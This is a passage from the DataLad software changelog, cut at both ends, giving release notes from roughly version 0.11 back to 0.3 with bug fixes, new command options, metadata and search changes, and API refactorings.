`GIT_SSH_VARIANT=ssh` to git processes to be able to specify\n alternative ports in SSH urls\n\n## Enhancements and new features\n\n- [search][] learned to suggest closely matching keys if there are no\n hits. ([#3089][])\n- [create-sibling][]\n - gained a `--group` option so that the caller can specify the file\n system group for the repository. ([#3098][])\n - now understands SSH URLs that have a port in them (i.e. the\n \"ssh://[user@]host.xz[:port]/path/to/repo.git/\" syntax mentioned\n in `man git-fetch`). ([#3146][])\n- Interface classes can now override the default renderer for\n summarizing results. 
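\n\nA minimal sketch of the 'unbound dataset method' convenience from the 0.11.3 notes above; the dataset path is hypothetical, and the same applies to other command methods:\n\n```python\nfrom datalad.distribution.dataset import Dataset\n\nds = Dataset('/tmp/myds')  # hypothetical, already existing dataset\n\n# No prior `import datalad.api` is required; accessing the method\n# imports the implementing module automatically.\nds.add('.', message='track everything')\n```\n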
([#3061][])\n- [run][]:\n - `--input` and `--output` can now be shortened to `-i` and `-o`.\n ([#3066][])\n - Placeholders such as \"{inputs}\" are now expanded in the command\n that is shown in the commit message subject. ([#3065][])\n - `interface.run.run_command` gained an `extra_inputs` argument so\n that wrappers like [datalad-container][] can specify additional inputs\n that aren't considered when formatting the command string. ([#3038][])\n - \"--\" can now be used to separate options for `run` and those for\n the command in ambiguous cases. ([#3119][])\n- The utilities `create_tree` and `ok_file_has_content` now support\n \".gz\" files. ([#3049][])\n- The Singularity container for 0.11.1 now uses [nd_freeze][] to make\n its builds reproducible.\n- A [publications][] page has been added to the documentation. ([#3099][])\n- `GitRepo.set_gitattributes` now accepts a `mode` argument that\n controls whether the .gitattributes file is appended to (default) or\n overwritten. ([#3115][])\n- `datalad --help` now avoids using `man` so that the list of\n subcommands is shown. ([#3124][])\n\n# 0.11.1 (Nov 26, 2018) -- v7-better-than-v6\n\nRushed out bugfix release to stay fully compatible with recent\n[git-annex][] which introduced v7 to replace v6.\n\n## Fixes\n\n- [install][]: be able to install recursively into a dataset ([#2982][])\n- [save][]: be able to commit/save changes whenever files potentially\n could have swapped their storage between git and annex\n ([#1651][]) ([#2752][]) ([#3009][])\n- [aggregate-metadata][]:\n - dataset's itself is now not \"aggregated\" if specific paths are\n provided for aggregation ([#3002][]). That resolves the issue of\n `-r` invocation aggregating all subdatasets of the specified dataset\n as well\n - also compare/verify the actual content checksum of aggregated metadata\n while considering subdataset metadata for re-aggregation ([#3007][])\n- `annex` commands are now chunked assuming 50% \"safety margin\" on the\n maximal command line length. Should resolve crashes while operating\n of too many files at ones ([#3001][])\n- `run` sidecar config processing ([#2991][])\n- no double trailing period in docs ([#2984][])\n- correct identification of the repository with symlinks in the paths\n in the tests ([#2972][])\n- re-evaluation of dataset properties in case of dataset changes ([#2946][])\n- [text2git][] procedure to use `ds.repo.set_gitattributes`\n ([#2974][]) ([#2954][])\n- Switch to use plain `os.getcwd()` if inconsistency with env var\n `$PWD` is detected ([#2914][])\n- Make sure that credential defined in env var takes precedence\n ([#2960][]) ([#2950][])\n\n## Enhancements and new features\n\n- [shub://datalad/datalad:git-annex-dev](https://singularity-hub.org/containers/5663/view)\n provides a Debian buster Singularity image with build environment for\n [git-annex][]. 
`tools/bisect-git-annex` provides a helper for running\n `git bisect` on git-annex using that Singularity container ([#2995][])\n- Added `.zenodo.json` for better integration with Zenodo for citation\n- [run-procedure][] now provides names and help messages with a custom\n renderer for ([#2993][])\n- Documentation: point to [datalad-revolution][] extension (prototype of\n the greater DataLad future)\n- [run][]\n - support injecting of a detached command ([#2937][])\n- `annex` metadata extractor now extracts `annex.key` metadata record.\n Should allow now to identify uses of specific files etc ([#2952][])\n- Test that we can install from http://datasets.datalad.org\n- Proper rendering of `CommandError` (e.g. in case of \"out of space\"\n error) ([#2958][])\n\n\n# 0.11.0 (Oct 23, 2018) -- Soon-to-be-perfect\n\n[git-annex][] 6.20180913 (or later) is now required - provides a number of\nfixes for v6 mode operations etc.\n\n## Major refactoring and deprecations\n\n- `datalad.consts.LOCAL_CENTRAL_PATH` constant was deprecated in favor\n of `datalad.locations.default-dataset` [configuration][config] variable\n ([#2835][])\n\n## Minor refactoring\n\n- `\"notneeded\"` messages are no longer reported by default results\n renderer\n- [run][] no longer shows commit instructions upon command failure when\n `explicit` is true and no outputs are specified ([#2922][])\n- `get_git_dir` moved into GitRepo ([#2886][])\n- `_gitpy_custom_call` removed from GitRepo ([#2894][])\n- `GitRepo.get_merge_base` argument is now called `commitishes` instead\n of `treeishes` ([#2903][])\n\n## Fixes\n\n- [update][] should not leave the dataset in non-clean state ([#2858][])\n and some other enhancements ([#2859][])\n- Fixed chunking of the long command lines to account for decorators\n and other arguments ([#2864][])\n- Progress bar should not crash the process on some missing progress\n information ([#2891][])\n- Default value for `jobs` set to be `\"auto\"` (not `None`) to take\n advantage of possible parallel get if in `-g` mode ([#2861][])\n- [wtf][] must not crash if `git-annex` is not installed etc ([#2865][]),\n ([#2865][]), ([#2918][]), ([#2917][])\n- Fixed paths (with spaces etc) handling while reporting annex error\n output ([#2892][]), ([#2893][])\n- `__del__` should not access `.repo` but `._repo` to avoid attempts\n for reinstantiation etc ([#2901][])\n- Fix up submodule `.git` right in `GitRepo.add_submodule` to avoid\n added submodules being non git-annex friendly ([#2909][]), ([#2904][])\n- [run-procedure][] ([#2905][])\n - now will provide dataset into the procedure if called within dataset\n - will not crash if procedure is an executable without `.py` or `.sh`\n suffixes\n- Use centralized `.gitattributes` handling while setting annex backend\n ([#2912][])\n- `GlobbedPaths.expand(..., full=True)` incorrectly returned relative\n paths when called more than once ([#2921][])\n\n## Enhancements and new features\n\n- Report progress on [clone][] when installing from \"smart\" git servers\n ([#2876][])\n- Stale/unused `sth_like_file_has_content` was removed ([#2860][])\n- Enhancements to [search][] to operate on \"improved\" metadata layouts\n ([#2878][])\n- Output of `git annex init` operation is now logged ([#2881][])\n- New\n - `GitRepo.cherry_pick` ([#2900][])\n - `GitRepo.format_commit` ([#2902][])\n- [run-procedure][] ([#2905][])\n - procedures can now recursively be discovered in subdatasets as well.\n The uppermost has highest priority\n - Procedures in user and system locations now take precedence 
over\n those in datasets.\n\n# 0.10.3.1 (Sep 13, 2018) -- Nothing-is-perfect\n\nEmergency bugfix to address forgotten boost of version in\n`datalad/version.py`.\n\n# 0.10.3 (Sep 13, 2018) -- Almost-perfect\n\nThis is largely a bugfix release which addressed many (but not yet all)\nissues of working with git-annex direct and version 6 modes, and operation\non Windows in general. Among enhancements you will see the\nsupport of public S3 buckets (even with periods in their names),\nability to configure new providers interactively, and improved `egrep`\nsearch backend.\n\nAlthough we do not require with this release, it is recommended to make\nsure that you are using a recent `git-annex` since it also had a variety\nof fixes and enhancements in the past months.\n\n## Fixes\n\n- Parsing of combined short options has been broken since DataLad\n v0.10.0. ([#2710][])\n- The `datalad save` instructions shown by `datalad run` for a command\n with a non-zero exit were incorrectly formatted. ([#2692][])\n- Decompression of zip files (e.g., through `datalad\n add-archive-content`) failed on Python 3. ([#2702][])\n- Windows:\n - colored log output was not being processed by colorama. ([#2707][])\n - more codepaths now try multiple times when removing a file to deal\n with latency and locking issues on Windows. ([#2795][])\n- Internal git fetch calls have been updated to work around a\n GitPython `BadName` issue. ([#2712][]), ([#2794][])\n- The progress bar for annex file transferring was unable to handle an\n empty file. ([#2717][])\n- `datalad add-readme` halted when no aggregated metadata was found\n rather than displaying a warning. ([#2731][])\n- `datalad rerun` failed if `--onto` was specified and the history\n contained no run commits. ([#2761][])\n- Processing of a command's results failed on a result record with a\n missing value (e.g., absent field or subfield in metadata). Now the\n missing value is rendered as \"N/A\". ([#2725][]).\n- A couple of documentation links in the \"Delineation from related\n solutions\" were misformatted. ([#2773][])\n- With the latest git-annex, several known V6 failures are no longer\n an issue. ([#2777][])\n- In direct mode, commit changes would often commit annexed content as\n regular Git files. A new approach fixes this and resolves a good\n number of known failures. ([#2770][])\n- The reporting of command results failed if the current working\n directory was removed (e.g., after an unsuccessful `install`). ([#2788][])\n- When installing into an existing empty directory, `datalad install`\n removed the directory after a failed clone. ([#2788][])\n- `datalad run` incorrectly handled inputs and outputs for paths with\n spaces and other characters that require shell escaping. ([#2798][])\n- Globbing inputs and outputs for `datalad run` didn't work correctly\n if a subdataset wasn't installed. ([#2796][])\n- Minor (in)compatibility with git 2.19 - (no) trailing period\n in an error message now. ([#2815][])\n\n## Enhancements and new features\n\n- Anonymous access is now supported for S3 and other downloaders. ([#2708][])\n- A new interface is available to ease setting up new providers. 
([#2708][])\n- Metadata: changes to egrep mode search ([#2735][])\n - Queries in egrep mode are now case-sensitive when the query\n contains any uppercase letters and are case-insensitive otherwise.\n The new mode egrepcs can be used to perform a case-sensitive query\n with all lower-case letters.\n - Search can now be limited to a specific key.\n - Multiple queries (list of expressions) are evaluated using AND to\n determine whether something is a hit.\n - A single multi-field query (e.g., `pa*:findme`) is a hit, when any\n matching field matches the query.\n - All matching key/value combinations across all (multi-field)\n queries are reported in the query_matched result field.\n - egrep mode now shows all hits rather than limiting the results to\n the top 20 hits.\n- The documentation on how to format commands for `datalad run` has\n been improved. ([#2703][])\n- The method for determining the current working directory on Windows\n has been improved. ([#2707][])\n- `datalad --version` now simply shows the version without the\n license. ([#2733][])\n- `datalad export-archive` learned to export under an existing\n directory via its `--filename` option. ([#2723][])\n- `datalad export-to-figshare` now generates the zip archive in the\n root of the dataset unless `--filename` is specified. ([#2723][])\n- After importing `datalad.api`, `help(datalad.api)` (or\n `datalad.api?` in IPython) now shows a summary of the available\n DataLad commands. ([#2728][])\n- Support for using `datalad` from IPython has been improved. ([#2722][])\n- `datalad wtf` now returns structured data and reports the version of\n each extension. ([#2741][])\n- The internal handling of gitattributes information has been\n improved. A user-visible consequence is that `datalad create\n --force` no longer duplicates existing attributes. ([#2744][])\n- The \"annex\" metadata extractor can now be used even when no content\n is present. ([#2724][])\n- The `add_url_to_file` method (called by commands like `datalad\n download-url` and `datalad add-archive-content`) learned how to\n display a progress bar. 
([#2738][])\n\n\n# 0.10.2 (Jul 09, 2018) -- Thesecuriestever\n\nPrimarily a bugfix release to accommodate recent git-annex release\nforbidding file:// and http://localhost/ URLs which might lead to\nrevealing private files if annex is publicly shared.\n\n## Fixes\n\n- fixed testing to be compatible with recent git-annex (6.20180626)\n- [download-url][] will now download to current directory instead of the\n top of the dataset\n\n## Enhancements and new features\n\n- do not quote ~ in URLs to be consistent with quote implementation in\n Python 3.7 which now follows RFC 3986\n- [run][] support for user-configured placeholder values\n- documentation on native git-annex metadata support\n- handle 401 errors from LORIS tokens\n- `yoda` procedure will instantiate `README.md`\n- `--discover` option added to [run-procedure][] to list available\n procedures\n\n# 0.10.1 (Jun 17, 2018) -- OHBM polish\n\nThe is a minor bugfix release.\n\n## Fixes\n\n- Be able to use backports.lzma as a drop-in replacement for pyliblzma.\n- Give help when not specifying a procedure name in `run-procedure`.\n- Abort early when a downloader received no filename.\n- Avoid `rerun` error when trying to unlock non-available files.\n\n# 0.10.0 (Jun 09, 2018) -- The Release\n\nThis release is a major leap forward in metadata support.\n\n## Major refactoring and deprecations\n\n- Metadata\n - Prior metadata provided by datasets under `.datalad/meta` is no\n longer used or supported. Metadata must be reaggregated using 0.10\n version\n - Metadata extractor types are no longer auto-guessed and must be\n explicitly specified in `datalad.metadata.nativetype` config\n (could contain multiple values)\n - Metadata aggregation of a dataset hierarchy no longer updates all\n datasets in the tree with new metadata. Instead, only the target\n dataset is updated. This behavior can be changed via the --update-mode\n switch. The new default prevents needless modification of (3rd-party)\n subdatasets.\n - Neuroimaging metadata support has been moved into a dedicated extension:\n https://github.com/datalad/datalad-neuroimaging\n- Crawler\n - moved into a dedicated extension:\n https://github.com/datalad/datalad-crawler\n- `export_tarball` plugin has been generalized to `export_archive` and\n can now also generate ZIP archives.\n- By default a dataset X is now only considered to be a super-dataset of\n another dataset Y, if Y is also a registered subdataset of X.\n\n## Fixes\n\nA number of fixes did not make it into the 0.9.x series:\n\n- Dynamic configuration overrides via the `-c` option were not in effect.\n- `save` is now more robust with respect to invocation in subdirectories\n of a dataset.\n- `unlock` now reports correct paths when running in a dataset subdirectory.\n- `get` is more robust to path that contain symbolic links.\n- symlinks to subdatasets of a dataset are now correctly treated as a symlink,\n and not as a subdataset\n- `add` now correctly saves staged subdataset additions.\n- Running `datalad save` in a dataset no longer adds untracked content to the\n dataset. In order to add content a path has to be given, e.g. `datalad save .`\n- `wtf` now works reliably with a DataLad that wasn't installed from Git (but,\n e.g., via pip)\n- More robust URL handling in `simple_with_archives` crawler pipeline.\n\n## Enhancements and new features\n\n- Support for DataLad extension that can contribute API components from 3rd-party sources,\n incl. 
commands, metadata extractors, and test case implementations.\n See https://github.com/datalad/datalad-extension-template for a demo extension.\n- Metadata (everything has changed!)\n - Metadata extraction and aggregation is now supported for datasets and individual\n files.\n - Metadata query via `search` can now discover individual files.\n - Extracted metadata can now be stored in XZ compressed files, is optionally\n annexed (when exceeding a configurable size threshold), and obtained on\n demand (new configuration option `datalad.metadata.create-aggregate-annex-limit`).\n - Status and availability of aggregated metadata can now be reported via\n `metadata --get-aggregates`\n - New configuration option `datalad.metadata.maxfieldsize` to exclude too large\n metadata fields from aggregation.\n - The type of metadata is no longer guessed during metadata extraction. A new\n configuration option `datalad.metadata.nativetype` was introduced to enable\n one or more particular metadata extractors for a dataset.\n - New configuration option `datalad.metadata.store-aggregate-content` to enable\n the storage of aggregated metadata for dataset content (i.e. file-based metadata)\n in contrast to just metadata describing a dataset as a whole.\n- `search` was completely reimplemented. It offers three different modes now:\n - 'egrep' (default): expression matching in a plain string version of metadata\n - 'textblob': search a text version of all metadata using a fully featured\n query language (fast indexing, good for keyword search)\n - 'autofield': search an auto-generated index that preserves individual fields\n of metadata that can be represented in a tabular structure (substantial\n indexing cost, enables the most detailed queries of all modes)\n- New extensions:\n - [addurls][], an extension for creating a dataset (and possibly subdatasets)\n from a list of URLs.\n - export_to_figshare\n - extract_metadata\n- add_readme makes use of available metadata\n- By default the wtf extension now hides sensitive information, which can be\n included in the output by passing `--senstive=some` or `--senstive=all`.\n- Reduced startup latency by only importing commands necessary for a particular\n command line call.\n- [create][]:\n - `-d <parent> --nosave` now registers subdatasets, when possible.\n - `--fake-dates` configures dataset to use fake-dates\n- [run][] now provides a way for the caller to save the result when a\n command has a non-zero exit status.\n- `datalad rerun` now has a `--script` option that can be used to extract\n previous commands into a file.\n- A DataLad Singularity container is now available on\n [Singularity Hub](https://singularity-hub.org/collections/667).\n- More casts have been embedded in the [use case section of the documentation](http://docs.datalad.org/en/docs/usecases/index.html).\n- `datalad --report-status` has a new value 'all' that can be used to\n temporarily re-enable reporting that was disable by configuration settings.\n\n\n# 0.9.3 (Mar 16, 2018) -- pi+0.02 release\n\nSome important bug fixes which should improve usability\n\n## Fixes\n\n- `datalad-archives` special remote now will lock on acquiring or\n extracting an archive - this allows for it to be used with -J flag\n for parallel operation\n- relax introduced in 0.9.2 demand on git being configured for datalad\n operation - now we will just issue a warning\n- `datalad ls` should now list \"authored date\" and work also for datasets\n in detached HEAD mode\n- `datalad save` will now save original file as well, if 
the file was\n \"git mv\"ed, so you can now `datalad run git mv old new` and have\n changes recorded\n\n## Enhancements and new features\n\n- `--jobs` argument can now take the `auto` value, which decides on the\n # of jobs depending on the # of available CPUs.\n `git-annex` > 6.20180314 is recommended to avoid regression with -J.\n- memoize calls to `RI` meta-constructor -- should speed up operation a\n bit\n- `DATALAD_SEED` environment variable could be used to seed Python RNG\n and provide reproducible UUIDs etc (useful for testing and demos)\n\n\n# 0.9.2 (Mar 04, 2018) -- it is (again) better than ever\n\nLargely a bugfix release with a few enhancements.\n\n## Fixes\n\n- Execution of external commands (git) should not get stuck when there is\n lots of both stdout and stderr output, and should not lose remaining\n output in some cases\n- Config overrides provided in the command line (-c) should now be\n handled correctly\n- Consider more remotes (not just the tracking one, which might be none)\n while installing subdatasets\n- Compatibility with git 2.16 with some changed behaviors/annotations\n for submodules\n- Fail `remove` if `annex drop` failed\n- Do not fail operating on files which start with dash (-)\n- URL unquote paths within S3, URLs and DataLad RIs (///)\n- In non-interactive mode fail if authentication/access fails\n- Web UI:\n - refactored a little to fix incorrect listing of submodules in\n subdirectories\n - now auto-focuses on search edit box upon entering the page\n- Assure that directories extracted from tarballs have the executable bit set\n\n## Enhancements and new features\n\n- A log message and progress bar will now inform if a tarball is to be\n downloaded while getting specific files\n (requires git-annex > 6.20180206)\n- A dedicated `datalad rerun` command capable of rerunning entire\n sequences of previously `run` commands.\n **Reproducibility through VCS. Use `run` even if not interested in `rerun`**\n- Alert the user if `git` is not yet configured but git operations\n are requested\n- Delay collection of previous ssh connections until it is actually\n needed.
Also do not require ':' while specifying ssh host\n- AutomagicIO: Added proxying of isfile, lzma.LZMAFile and io.open\n- Testing:\n - added DATALAD_DATASETS_TOPURL=http://datasets-tests.datalad.org to\n run tests against another website to not obscure access stats\n - tests run against temporary HOME to avoid side-effects\n - better unit-testing of interactions with special remotes\n- CONTRIBUTING.md describes how to setup and use `git-hub` tool to\n \"attach\" commits to an issue making it into a PR\n- DATALAD_USE_DEFAULT_GIT env variable could be used to cause DataLad\n to use default (not the one possibly bundled with git-annex) git\n- Be more robust while handling not supported requests by annex in\n special remotes\n- Use of `swallow_logs` in the code was refactored away -- less\n mysteries now, just increase logging level\n- `wtf` plugin will report more information about environment, externals\n and the system\n\n\n# 0.9.1 (Oct 01, 2017) -- \"DATALAD!\"(JBTM)\n\nMinor bugfix release\n\n## Fixes\n\n- Should work correctly with subdatasets named as numbers of bool\n values (requires also GitPython >= 2.1.6)\n- Custom special remotes should work without crashing with \n git-annex >= 6.20170924\n\n\n# 0.9.0 (Sep 19, 2017) -- isn't it a lucky day even though not a Friday?\n\n## Major refactoring and deprecations\n\n- the `files` argument of [save][] has been renamed to `path` to be uniform with\n any other command\n- all major commands now implement more uniform API semantics and result reporting.\n Functionality for modification detection of dataset content has been completely replaced\n with a more efficient implementation\n- [publish][] now features a `--transfer-data` switch that allows for a\n disambiguous specification of whether to publish data -- independent of\n the selection which datasets to publish (which is done via their paths).\n Moreover, [publish][] now transfers data before repository content is pushed.\n\n## Fixes\n\n- [drop][] no longer errors when some subdatasets are not installed\n- [install][] will no longer report nothing when a Dataset instance was\n given as a source argument, but rather perform as expected\n- [remove][] doesn't remove when some files of a dataset could not be dropped\n- [publish][] \n - no longer hides error during a repository push\n - publish behaves \"correctly\" for `--since=` in considering only the\n differences the last \"pushed\" state\n - data transfer handling while publishing with dependencies, to github\n- improved robustness with broken Git configuration\n- [search][] should search for unicode strings correctly and not crash\n- robustify git-annex special remotes protocol handling to allow for spaces in\n the last argument\n- UI credentials interface should now allow to Ctrl-C the entry\n- should not fail while operating on submodules named with\n numerics only or by bool (true/false) names\n- crawl templates should not now override settings for `largefiles` if \n specified in `.gitattributes`\n\n\n## Enhancements and new features\n\n- **Exciting new feature** [run][] command to protocol execution of an external \n command and rerun computation if desired. 
\n See [screencast](http://datalad.org/features.html#reproducible-science)\n- [save][] now uses Git for detecting which subdatasets need to be inspected for\n potential changes, instead of performing a complete traversal of a dataset tree\n- [add][] looks for changes relative to the last committed state of a dataset\n to discover files to add more efficiently\n- [diff][] can now report untracked files in addition to modified files\n- [uninstall][] will check itself whether a subdataset is properly registered in a\n superdataset, even when no superdataset is given in a call\n- [subdatasets][] can now configure subdatasets for exclusion from recursive\n installation (`datalad-recursiveinstall` submodule configuration property)\n- precrafted pipelines of [crawl][] now will not override `annex.largefiles`\n setting if any was set within `.gitattributes` (e.g. by `datalad create --text-no-annex`)\n- framework for screencasts: `tools/cast*` tools and sample cast scripts under\n `doc/casts` which are published at [datalad.org/features.html](http://datalad.org/features.html)\n- new [project YouTube channel](https://www.youtube.com/channel/UCB8-Zf7D0DSzAsREoIt0Bvw)\n- tests failing in direct and/or v6 modes marked explicitly\n\n# 0.8.1 (Aug 13, 2017) -- the best birthday gift\n\nBugfixes\n\n## Fixes\n\n- Do not attempt to [update][] a not-installed sub-dataset\n- In case of too many files to be specified for [get][] or [copy_to][], we\n will make multiple invocations of the underlying git-annex command to not\n overfill the command line\n- More robust handling of unicode output in terminals which might not support it\n\n## Enhancements and new features\n\n- Ship a copy of numpy.testing to facilitate [test][] without requiring numpy\n as a dependency. Also allow specifying which test(s) to run\n- In [get][] and [copy_to][] provide the actual originally requested paths, not the\n ones we deduced need to be transferred, solely for knowing the total\n\n\n# 0.8.0 (Jul 31, 2017) -- it is better than ever\n\nA variety of fixes and enhancements\n\n## Fixes\n\n- [publish][] would now push the merged `git-annex` branch even if no other changes\n were done\n- [publish][] should be able to publish using a relative path within an SSH URI\n (git hook would use relative paths)\n- [publish][] should better tolerate publishing to pure git and `git-annex`\n special remotes\n\n## Enhancements and new features\n\n- [plugin][] mechanism came to replace [export][]. See [export_tarball][] for the\n replacement of [export][]. Now it should be easy to extend datalad's interface\n with custom functionality to be invoked along with other commands.\n- Minimalistic coloring of the results rendering\n- [publish][]/`copy_to` now have progress bar reporting and support for `--jobs`\n- minor fixes and enhancements to the crawler (e.g. support of recursive removes)\n\n\n# 0.7.0 (Jun 25, 2017) -- when it works - it is quite awesome!\n\nNew features, refactorings, and bug fixes.\n\n## Major refactoring and deprecations\n\n- [add-sibling][] has been fully replaced by the [siblings][] command\n- [create-sibling][] and [unlock][] have been re-written to support the\n same common API as most other commands\n\n## Enhancements and new features\n\n- [siblings][] can now be used to query and configure a local repository by\n using the sibling name ``here``\n- [siblings][] can now query and set annex preferred content configuration.
This\n includes ``wanted`` (as previously supported in other commands), and now\n also ``required``\n- New [metadata][] command to interface with datasets/files [meta-data][]\n- Documentation for all commands is now built in a uniform fashion\n- Significant parts of the documentation have been updated\n- Instantiate GitPython's Repo instances lazily\n\n## Fixes\n\n- API documentation is now rendered properly as HTML, and is easier to browse by\n having more compact pages\n- Closed files left open on various occasions (Popen PIPEs, etc)\n- Restored basic (consumer mode of operation) compatibility with Windows OS\n\n\n# 0.6.0 (Jun 14, 2017) -- German perfectionism\n\nThis release includes a **huge** refactoring to make the code base and functionality\nmore robust and flexible\n\n- outputs from API commands can now be highly customized. See\n `--output-format`, `--report-status`, and `--report-type`\n options for the [datalad][] command.\n- effort was made to refactor the code base so that underlying functions behave as\n generators where possible\n- input paths/arguments analysis was redone for the majority of the commands to provide\n unified behavior\n\n## Major refactoring and deprecations\n\n- `add-sibling` and `rewrite-urls` were refactored in favor of the new [siblings][]\n command which should be used for siblings manipulations\n- 'datalad.api.alwaysrender' config setting/support is removed in favor of the new\n outputs processing\n\n## Fixes\n\n- Do not manually flush the git index in pre-commit to avoid the \"Death by the Lock\" issue\n- The `post-update` hook script deployed by [publish][] should now be more robust\n (tolerate directory names with spaces, etc.)\n- A variety of fixes, see\n [list of pull requests and issues closed](https://github.com/datalad/datalad/milestone/41?closed=1)\n for more information\n\n## Enhancements and new features\n\n- new [annotate-paths][] plumbing command to inspect and annotate provided\n paths. Use `--modified` to summarize changes between different points in\n the history\n- new [clone][] plumbing command to provide a subset (install a single dataset\n from a URL) of the functionality of [install][]\n- new [diff][] plumbing command\n- new [siblings][] command to list or manipulate siblings\n- new [subdatasets][] command to list subdatasets and their properties\n- [drop][] and [remove][] commands were refactored\n- `benchmarks/` collection of [Airspeed velocity](https://github.com/spacetelescope/asv/)\n benchmarks initiated. See reports at http://datalad.github.io/datalad/\n- crawler would try to download a new url multiple times, increasing the delay between\n attempts. Helps to resolve problems with extended crawls of Amazon S3\n- [CRCNS][] crawler pipeline now also fetches and aggregates meta-data for the\n datasets from datacite\n- overall optimisations to benefit from the aforementioned refactoring and\n improve user-experience\n- a few stub and not (yet) implemented commands (e.g. `move`) were removed from\n the interface\n- Web frontend got proper coloring for the breadcrumbs and some additional\n caching to speed up interactions. See http://datasets.datalad.org\n- Small improvements to the online documentation. See e.g.\n [summary of differences between git/git-annex/datalad](http://docs.datalad.org/en/latest/related.html#git-git-annex-datalad)\n\n# 0.5.1 (Mar 25, 2017) -- cannot stop the progress\n\nA bugfix release\n\n## Fixes\n\n- [add][] was forcing addition of files to annex regardless of settings\n in `.gitattributes`.
Now that decision is left to annex by default\n- `tools/testing/run_doc_examples` used to run\n doc examples as tests, fixed up to provide status per each example\n and not fail at once\n- `doc/examples`\n - [3rdparty_analysis_workflow.sh](http://docs.datalad.org/en/latest/generated/examples/3rdparty_analysis_workflow.html)\n was fixed up to reflect changes in the API of 0.5.0.\n- progress bars\n - should no longer crash **datalad** and report correct sizes and speeds\n - should provide progress reports while using Python 3.x\n\n## Enhancements and new features\n\n- `doc/examples`\n - [nipype_workshop_dataset.sh](http://docs.datalad.org/en/latest/generated/examples/nipype_workshop_dataset.html)\n new example to demonstrate how new super- and sub- datasets were established\n as a part of our datasets collection\n\n\n# 0.5.0 (Mar 20, 2017) -- it's huge\n\nThis release includes an avalanche of bug fixes, enhancements, and\nadditions which at large should stay consistent with previous behavior\nbut provide better functioning. Lots of code was refactored to provide\nmore consistent code-base, and some API breakage has happened. Further\nwork is ongoing to standardize output and results reporting\n([#1350][])\n\n## Most notable changes\n\n- requires [git-annex][] >= 6.20161210 (or better even >= 6.20161210 for\n improved functionality)\n- commands should now operate on paths specified (if any), without\n causing side-effects on other dirty/staged files\n- [save][]\n - `-a` is deprecated in favor of `-u` or `--all-updates`\n so only changes known components get saved, and no new files\n automagically added\n - `-S` does no longer store the originating dataset in its commit\n message\n- [add][]\n - can specify commit/save message with `-m`\n- [add-sibling][] and [create-sibling][]\n - now take the name of the sibling (remote) as a `-s` (`--name`)\n option, not a positional argument\n - `--publish-depends` to setup publishing data and code to multiple\n repositories (e.g. github + webserve) should now be functional\n see [this comment](https://github.com/datalad/datalad/issues/335#issuecomment-277240733)\n - got `--publish-by-default` to specify what refs should be published\n by default\n - got `--annex-wanted`, `--annex-groupwanted` and `--annex-group`\n settings which would be used to instruct annex about preferred\n content. 
[publish][] then will publish data using those settings if\n `wanted` is set.\n - got `--inherit` option to automagically figure out url/wanted and\n other git/annex settings for new remote sub-dataset to be constructed\n- [publish][]\n - got `--skip-failing` refactored into `--missing` option\n which could use new feature of [create-sibling][] `--inherit`\n\n## Fixes\n\n- More consistent interaction through ssh - all ssh connections go\n through [sshrun][] shim for a \"single point of authentication\", etc.\n- More robust [ls][] operation outside of the datasets\n- A number of fixes for direct and v6 mode of annex\n\n## Enhancements and new features\n\n- New [drop][] and [remove][] commands\n- [clean][]\n - got `--what` to specify explicitly what cleaning steps to perform\n and now could be invoked with `-r`\n- `datalad` and `git-annex-remote*` scripts now do not use setuptools\n entry points mechanism and rely on simple import to shorten start up time\n- [Dataset][] is also now using [Flyweight pattern][], so the same instance is\n reused for the same dataset\n- progressbars should not add more empty lines\n\n## Internal refactoring\n\n- Majority of the commands now go through `_prep` for arguments validation\n and pre-processing to avoid recursive invocations\n\n\n# 0.4.1 (Nov 10, 2016) -- CA release\n\nRequires now GitPython >= 2.1.0\n\n## Fixes\n\n- [save][]\n - to not save staged files if explicit paths were provided\n- improved (but not yet complete) support for direct mode\n- [update][] to not crash if some sub-datasets are not installed\n- do not log calls to `git config` to avoid leakage of possibly \n sensitive settings to the logs\n\n## Enhancements and new features\n\n- New [rfc822-compliant metadata][] format\n- [save][]\n - -S to save the change also within all super-datasets\n- [add][] now has progress-bar reporting\n- [create-sibling-github][] to create a :term:`sibling` of a dataset on\n github\n- [OpenfMRI][] crawler and datasets were enriched with URLs to separate\n files where also available from openfmri s3 bucket\n (if upgrading your datalad datasets, you might need to run\n `git annex enableremote datalad` to make them available)\n- various enhancements to log messages\n- web interface\n - populates \"install\" box first thus making UX better over slower\n connections\n\n\n# 0.4 (Oct 22, 2016) -- Paris is waiting\n\nPrimarily it is a bugfix release but because of significant refactoring\nof the [install][] and [get][] implementation, it gets a new minor release. 
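\nFor orientation, here is a minimal sketch of the refactored install/get split via the Python API (the dataset URL and file paths below are hypothetical placeholders, not taken from these notes):\n\n```python\n# Minimal sketch: install a dataset first, then fetch file content\n# separately now that `get` is a command of its own.\n# The source URL and paths are placeholders for illustration only.\nfrom datalad.api import install, get\n\nds = install(path=\"my-dataset\", source=\"https://example.com/some/dataset.git\")\nget(\"my-dataset/data/file1.dat\")\n```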
\n\n## Fixes\n\n- be able to [get][] or [install][] while providing paths when\n outside of a dataset\n- remote annex datasets get properly initialized\n- robust detection of outdated [git-annex][]\n\n## Enhancements and new features\n\n- interface changes\n - [get][] `--recursion-limit=existing` to not recurse into not-installed\n subdatasets\n - [get][] `-n` to possibly install sub-datasets without getting any data\n - [install][] `--jobs|-J` to specify number of parallel jobs for annex\n [get][] call could use (ATM would not work when data comes from archives)\n- more (unit-)testing\n- documentation: see http://docs.datalad.org/en/latest/basics.html\n for basic principles and useful shortcuts in referring to datasets\n- various webface improvements: breadcrumb paths, instructions on how\n to install a dataset, show version from the tags, etc.\n\n# 0.3.1 (Oct 1, 2016) -- what a wonderful week\n\nPrimarily bugfixes but also a number of enhancements and core\nrefactorings\n\n## Fixes\n\n- do not build manpages and examples during installation to avoid\n problems with possibly previously outdated dependencies\n- [install][] can be called on an already installed dataset (with `-r` or\n `-g`)\n\n## Enhancements and new features\n\n- complete overhaul of datalad configuration settings handling\n (see [Configuration documentation][]), so the majority of the environment\n variables we have used were renamed to match configuration names.\n Now uses git format and stores persistent configuration settings under\n `.datalad/config` and local ones within `.git/config`\n- [create-sibling][] now does not by default upload the web front-end\n- [export][] command with a plug-in interface and `tarball` plugin to export\n datasets\n- in Python, `.api` functions with rendering of results in the command line\n got a _-suffixed sibling, which would render results in Python\n as well (e.g., using `search_` instead of `search` would also render\n results, not only output them back as Python objects)\n- [get][]\n - `--jobs` option (passed to `annex get`) for parallel downloads\n - total and per-download (with git-annex >= 6.20160923) progress bars\n (note that if content is to be obtained from an archive, no progress\n will be reported yet)\n- [install][] `--reckless` mode option\n- [search][]\n - highlights locations 